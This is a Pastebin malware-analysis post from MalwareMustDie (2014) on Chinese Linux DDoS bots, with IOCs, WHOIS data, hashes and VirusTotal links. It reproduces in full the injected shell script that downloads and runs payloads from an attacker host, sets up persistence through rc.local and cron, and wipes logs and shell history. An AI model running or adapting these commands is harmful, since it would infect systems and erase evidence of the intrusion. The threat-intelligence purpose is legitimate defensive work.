Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #MalwareMustDie!! Tue Oct 14 21:37:28 JST 2014
- // Multiple China DDoS-er/backdoor payloads was reported in action infecting victim using
- // one-liner long shell command
- // Initial case: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
- // Follow up report: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html?showComment=1413220693224#c4466937356030505144
- // Payloads are: China ELF DDoS-er malware multiple type:
- (1) Linux/IptabLes|x , (2) Linux/BillGates & (3) Linux/Elknot (packed & unpacked)
- // One line injected command:
- "/etc/init.d/iptables stop
- echo "nameserver 8.8.8.8" >> /etc/resolv.conf
- echo "nameserver 8.8.4.4" >> /etc/resolv.conf
- apt-get -y install wget
- yum -y install wget
- chmod 7777 / etc
- killall -9 .IptabLes
- killall -9 nfsd4
- killall -9 profild.key
- cd /etc;rm -rf dir fake.cfg
- killall -9 nfsd
- killall -9 DDosl
- killall -9 lengchao32
- killall -9 b26
- killall -9 khelper
- killall -9 Bill
- killall -9 n26
- killall -9 007
- killall -9 codelove
- killall -9 32
- killall -9 m32
- killall -9 m64
- killall -9 64
- killall -9 83BOT
- killall -9 82BOT
- killall -9 dos64
- killall -9 dos32
- killall -9 new6
- killall -9 new4
- killall -9 node24
- killall -9 mimi
- killall -9 nodeJR-1
- killall -9 freeBSD
- killall -9 ksapdd
- killall -9 106
- killall -9 09
- killall -9 xsw
- killall -9 syslogd
- killall -9 skysapdd
- killall -9 cupsddd
- killall -9 ksapd
- killall -9 atddd
- killall -9 xfsdxd
- killall -9 sfewfesfs
- killall -9 gfhjrtfyhuf
- killall -9 rewgtf3er4t
- killall -9 fdsfsfvff
- killall -9 smarvtd
- killall -9 whitptabil
- killall -9 gdmorpen
- cd /etc;chattr -i 66
- cd /root; chmod 7777 / etc
- killall -9 minerd
- killall -9 syn
- killall -9 joudckfr
- killall -9 www
- killall -9 log
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .Mm2
- killall -9 acpid
- killall -9 m64
- killall -9 ./QQ
- killall -9 aabb
- killall -9 g3
- killall -9 S99local
- killall -9 3
- killall -9 pm
- killall -9 qweasd
- killall -9 tangtang
- killall -9 imap-login
- killall -9 xudp
- killall -9 sshpa
- killall -9 008
- killall -9 txma
- killall -9 mrdos64.b00
- killall -9 mrdos32.b00
- killall -9 kkpklp
- killall -9 kiilp
- killall -9 xin1
- killall -9 jibateng
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 syscore.sh
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeo
- killall -9 .mimeop
- killall -9 .task1
- killall -9 .mimeop
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- killall -9 .IptabLes
- killall -9 .IptabLex
- cd /root;rm -rf dir nohup.out
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsddd.*
- cd /etc;rm -rf dir atddd.*
- cd /etc;rm -rf dir ksapdd.*
- cd /etc;rm -rf dir kysapdd.*
- cd /etc;rm -rf dir sksapdd.*
- cd /etc;rm -rf dir skysapdd.*
- cd /etc;rm -rf dir xfsdxd.*
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsdd.*
- cd /etc;rm -rf dir atdd.*
- cd /etc;rm -rf dir ksapd.*
- cd /etc;rm -rf dir kysapd.*
- cd /etc;rm -rf dir sksapd.*
- cd /etc;rm -rf dir skysapd.*
- cd /etc;rm -rf dir xfsdx.*
- cd /etc;rm -rf dir sfewfesfs
- cd /etc;rm -rf dir gfhjrtfyhuf
- cd /etc;rm -rf dir rewgtf3er4t
- cd /etc;rm -rf dir fdsfsfvff
- cd /etc;rm -rf dir smarvtd
- cd /etc;rm -rf dir whitptabil
- cd /etc;rm -rf dir gdmorpen
- cd /etc;rm -rf dir sfewfesfs.*
- cd /etc;rm -rf dir gfhjrtfyhuf.*
- cd /etc;rm -rf dir rewgtf3er4t.*
- cd /etc;rm -rf dir fdsfsfvff.*
- cd /etc;rm -rf dir smarvtd.*
- cd /etc;rm -rf dir whitptabil.*
- cd /etc;rm -rf dir gdmorpen.*
- cd /etc;rm -rf dir nhgbhhj.*
- cd /tmp;rm -rf dir 1.*
- cd /tmp;rm -rf dir 2.*
- cd /tmp;rm -rf dir 3.*
- cd /tmp;rm -rf dir 4.*
- cd /tmp;rm -rf dir 5.*
- cd /tmp;rm -rf dir jdhe
- cd /tmp;rm -rf dir jdhe.*
- cd /var/spool/cron; rm -rf dir root.*
- cd /var/spool/cron; rm -rf dir root
- cd /var/spool/cron/crontabs; rm -rf dir root.*
- cd /var/spool/cron/crontabs; rm -rf dir root
- cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
- cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
- yes|mv /tmp/root /var/spool/cron
- yes|mv /tmp/root /var/spool/cron/crontabs
- cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
- cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
- cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
- cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
- cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
- cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
- cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
- cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
- cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
- cd /etc;wget -c http://www.frade8c.com:9162/byv832
- cd /tmp;chmod 7777 jdhe
- cd /etc;chmod 7777 nhgbhhj
- cd /etc;chmod 7777 byv832
- cd /etc;chmod 7777 sfewfesfs
- cd /etc;chmod 7777 gfhjrtfyhuf
- cd /etc;chmod 7777 rewgtf3er4t
- cd /etc;chmod 7777 fdsfsfvff
- cd /etc;chmod 7777 smarvtd
- cd /etc;chmod 7777 whitptabil
- cd /etc;chmod 7777 gdmorpen
- cd /tmp;chmod 7777 nhgbhhj
- cd /tmp;chmod 7777 byv832
- cd /tmp;chmod 7777 sfewfesfs
- cd /tmp;chmod 7777 gfhjrtfyhuf
- cd /tmp;chmod 7777 rewgtf3er4t
- cd /tmp;chmod 7777 fdsfsfvff
- cd /tmp;chmod 7777 smarvtd
- cd /tmp;chmod 7777 whitptabil
- cd /tmp;chmod 7777 gdmorpen
- cd /tmp;./jdhe
- nohup /etc/sfewfesfs > /dev/null 2>&1&
- nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
- nohup /etc/rewgtf3er4t > /dev/null 2>&1&
- nohup /etc/fdsfsfvff > /dev/null 2>&1&
- nohup /etc/smarvtd > /dev/null 2>&1&
- nohup /etc/whitptabil > /dev/null 2>&1&
- nohup /etc/gdmorpen > /dev/null 2>&1&
- nohup /etc/nhgbhhj > /dev/null 2>&1&
- nohup /etc/byv832 > /dev/null 2>&1&
- nohup /tmp/sfewfesfs > /dev/null 2>&1&
- nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
- nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
- nohup /tmp/fdsfsfvff > /dev/null 2>&1&
- nohup /tmp/smarvtd > /dev/null 2>&1&
- nohup /tmp/whitptabil > /dev/null 2>&1&
- nohup /tmp/gdmorpen > /dev/null 2>&1&
- nohup /tmp/nhgbhhj > /dev/null 2>&1&
- nohup /tmp/byv832 > /dev/null 2>&1&
- echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
- echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
- echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
- echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
- echo "cd /tmp;./smarvtd" >> /etc/rc.local
- echo "cd /tmp;./whitptabil" >> /etc/rc.local
- echo "cd /tmp;./gdmorpen" >> /etc/rc.local
- echo "cd /etc;./sfewfesfs" >> /etc/rc.local
- echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
- echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
- echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
- echo "cd /etc;./smarvtd" >> /etc/rc.local
- echo "cd /etc;./whitptabil" >> /etc/rc.local
- echo "cd /etc;./gdmorpen" >> /etc/rc.local
- echo "unset MAILCHECK" >> /etc/profile
- cd /etc;chattr +i sfewfesfs
- rm -rf /root/.bash_history
- touch /root/.bash_history
- history -r
- cd /var/log > dmesg
- cd /var/log > auth.log
- cd /var/log > alternatives.log
- cd /var/log > boot.log
- cd /var/log > btmp
- cd /var/log > cron
- cd /var/log > cups
- cd /var/log > daemon.log
- cd /var/log > dpkg.log
- cd /var/log > faillog
- cd /var/log > kern.log
- cd /var/log > lastlog
- cd /var/log > maillog
- cd /var/log > user.log
- cd /var/log > Xorg.x.log
- cd /var/log > anaconda.log
- cd /var/log > yum.log
- cd /var/log > secure
- cd /var/log > wtmp
- cd /var/log > utmp
- cd /var/log > messages
- cd /var/log > spooler
- cd /var/log > sudolog
- cd /var/log > aculog
- cd /var/log > access-log
- cd /root > .bash_history
- history -c"
- // Payload URLS:
- h00p://www.frade8c.com:9162/root (crontab script garbage)
- h00p://www.frade8c.com:9162/jdhe
- h00p://www.frade8c.com:9162/sfewfesfs
- h00p://www.frade8c.com:9162/gfhjrtfyhuf
- h00p://www.frade8c.com:9162/rewgtf3er4t
- h00p://www.frade8c.com:9162/fdsfsfvff
- h00p://www.frade8c.com:9162/smarvtd
- h00p://www.frade8c.com:9162/whitptabil
- h00p://www.frade8c.com:9162/gdmorpen
- h00p://www.frade8c.com:9162/nhgbhhj
- h00p://www.frade8c.com:9162/byv832
- // Source analyzed:
- Date: 2014-10-14 19:57:50
- Resolving www.frade8c.com (www.frade8c.com)... 219.135.56.211
- Caching www.frade8c.com => 219.135.56.211
- Connecting to www.frade8c.com (www.frade8c.com)|219.135.56.211|:9162... connected.
- Host: www.frade8c.com:9162
- Connection: Keep-Alive
- HTTP request sent, awaiting response...
- ---response---
- HTTP/1.1 200 OK
- Server: nginx/1.6.2
- Date: Tue, 14 Oct 2014 18:58:37 GMT
- Content-Type: application/octet-stream
- Content-Length: 1554782
- Last-Modified: Sun, 24 Aug 2014 18:29:06 GMT
- Connection: keep-alive
- ETag: "53fa2ef2-17b95e"
- Accept-Ranges: bytes
- 200 OK
- Registered socket 4 for persistent reuse.
- Length: 1554782 (1.5M) [application/octet-stream]
- // Server Location: CHINA
- 219.135.56.211|211.56.135.219.broad.fs.gd.dynamic.163data.com.cn.|4134 | 219.128.0.0/13 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK
- // Domain Registration; CHINA
- Domain Name: FRADE8C.COM
- Registrar: GODADDY.COM, LLC
- Whois Server: whois.godaddy.com
- Referral URL: http://registrar.godaddy.com
- Name Server: FREE.QYCN.CN
- Name Server: FREE.QYCN.COM
- Name Server: FREE.QYCN.NET
- Name Server: FREE.QYCN.ORG
- Status: clientDeleteProhibited
- Status: clientRenewProhibited
- Status: clientTransferProhibited
- Status: clientUpdateProhibited
- Updated Date: 10-sep-2014
- Creation Date: 12-may-2014
- Expiration Date: 12-may-2015
- >>> Last update of whois database: Tue, 14 Oct 2014 11:48:23 GMT <<<
- Domain Name: FRADE8C.COM
- Registry Domain ID: 1858356025_DOMAIN_COM-VRSN
- Registrar WHOIS Server: whois.godaddy.com
- Registrar URL: http://www.godaddy.com
- Update Date: 2014-05-12 12:05:14
- Creation Date: 2014-05-12 11:43:36
- Registrar Registration Expiration Date: 2015-05-12 11:43:36
- Registrar: GoDaddy.com, LLC
- Registrar IANA ID: 146
- Registrar Abuse Contact Email: abuse@godaddy.com
- Registrar Abuse Contact Phone: +1.480-624-2505
- Domain Status: clientTransferProhibited
- Domain Status: clientUpdateProhibited
- Domain Status: clientRenewProhibited
- Domain Status: clientDeleteProhibited
- Registry Registrant ID:
- Registrant Name: xiao buyu
- Registrant Organization:
- Registrant Street: shanghaishirenminluyihao
- Registrant City: shanghai
- Registrant State/Province: shanghai
- Registrant Postal Code: 200000
- Registrant Country: China
- Registrant Phone: +0.862185966589
- Registrant Phone Ext:
- Registrant Fax:
- Registrant Fax Ext:
- Registrant Email: zhucegodaddy@126.com
- Registry Admin ID:
- Last update of WHOIS database: 2014-10-14T11:00:00Z
- // PAYLOAD ANALYSIS RESULT:
- $ #MalwareMustDie!
- $ # Just finished categorized & analized these Chinese Ddoser mess:
- $
- $ date
- Tue Oct 14 20:39:16 JST 2014
- $
- $ file *
- byv832.IptabLes.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
- fdsfsfvff.IptabLes.x32.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
- gdmorpen.IptabLes.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
- gfhjrtfyhuf-unpack.Elknot.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
- gfhjrtfyhuf.packed.Elknot.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
- jdhe.BillGates.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, for FreeBSD 8.4, not stripped
- nhgbhhj.BillGates.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
- rewgtf3er4t.IptabLes.x64.mmd: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
- sfewfesfs.BillGates.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
- smarvtd-packed.Elknot.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
- smarvtd-unpack.Elknot.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
- whitptabil-unpack.Elknot.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
- whitptabil.pack.Elknot.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
- $ md5 *
- MD5 (byv832.IptabLes.mmd) = f7556d9ede5d988400b1edbb1a172634
- MD5 (fdsfsfvff.IptabLes.x32.mmd) = 048016c6e6848f92a29296b72df4d2d8
- MD5 (gdmorpen.IptabLes.mmd) = e029dd6a6570c70a2b12301db8b508d1 = smarvtd-packed.Elknot.mmd = whitptabil.pack.Elknot.mmd
- MD5 (gfhjrtfyhuf.packed.Elknot.mmd) = 9941a4dc930868a5739a8004de53a686
- MD5 (gfhjrtfyhuf-unpack.Elknot.mmd) = 4f446e593dd83a24199ec2e7a84ac86a
- MD5 (jdhe.BillGates.mmd) = 7f3445e754493e76e09713cbc6415308
- MD5 (nhgbhhj.BillGates.mmd) = 8a9b27ee8ff7475ef535217583e02d8f
- MD5 (rewgtf3er4t.IptabLes.x64.mmd) = 18bcb1c192df95a4216946f0294135bf
- MD5 (sfewfesfs.BillGates.mmd) = 8285f35183f0341b8dfe425b7348411d
- MD5 (smarvtd-unpack.Elknot.mmd) = fe060c05813fe155273f5b87bb59f960 = whitptabil-unpack.Elknot.mmd
- https://www.virustotal.com/en/file/b0329f31923b7c39ddd1f345d12add01fdfeee6000ee03657163f87c7a09a527/analysis/1413287761/
- https://www.virustotal.com/en/file/ec4645d8306648a713e2b22849e72ff6eeb3931a83cee352fd105448577e6220/analysis/1413287839/
- https://www.virustotal.com/en/file/8f929aa1171de80191788fd78f56173de72048d15914f814f5271f00e6882324/analysis/1413287924/
- https://www.virustotal.com/en/file/5dbd1150f20fe8cd84f03484b661b5e822ff43a7e51d6c1d44c426f21cab225b/analysis/1413287986/
- https://www.virustotal.com/en/file/90f268827ea8f2543d38d1cb90a2f56da506e2152164984c8eb59b3043b485fc/analysis/1413288124/
- https://www.virustotal.com/en/file/e2895e8a671aa0c72ebaf7deabcef0b319b4952145f177749f6caef6293ac637/analysis/1413288173/
- https://www.virustotal.com/en/file/60cf05e05231cac5a0f0361f7626785db475f6b8f33bd8c3aaf948c0e1118ad3/analysis/1413288297/
- https://www.virustotal.com/en/file/f759be8115df769d493ecad3fb2cac09b36aba098f273c22d39364bd23f3138c/analysis/1413288354/
- https://www.virustotal.com/en/file/551b48e425dcf4337ee023ad65a871123d172e43fabbc965252f5a2e69d0bd4a/analysis/1413288439/
- https://www.virustotal.com/en/file/8f929aa1171de80191788fd78f56173de72048d15914f814f5271f00e6882324/analysis/1413288528/
- https://www.virustotal.com/en/file/3c45adc937187d90b6a350a51d2ff0d285d5609af8872433437761406262aefb/analysis/1413288612/
- #------
- #Your report will be followed properly
- #MalwareMustDie!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement